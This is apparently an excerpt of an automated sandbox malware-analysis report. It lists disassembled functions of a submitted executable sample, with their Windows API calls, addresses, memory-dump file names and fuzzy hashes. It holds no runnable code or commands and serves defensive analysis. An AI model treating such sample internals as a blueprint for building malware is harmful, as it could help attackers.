                                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Proc$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 2351499541-0
                                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1795658109-0
                                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                        APIs
                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                                        • String ID:
                                                                                        • API String ID: 2886238975-0
                                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1792727568-0
                                                                                        • Opcode ID: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                        • Opcode Fuzzy Hash: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                        APIs
                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                        APIs
                                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 3850814276-3896280584
                                                                                        • Opcode ID: eab5caaf8cebb6f5662be367d5553fa0266aedcf90c4b6dcb8dc903e3d6702f8
                                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                        • Opcode Fuzzy Hash: eab5caaf8cebb6f5662be367d5553fa0266aedcf90c4b6dcb8dc903e3d6702f8
                                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                        APIs
                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                        • gethostbyname.WSOCK32(?), ref: 0046D42D
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 2502553879-0
                                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                        APIs
                                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 312131281-0
                                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                                        • String ID:
                                                                                        • API String ID: 1358664141-0
                                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
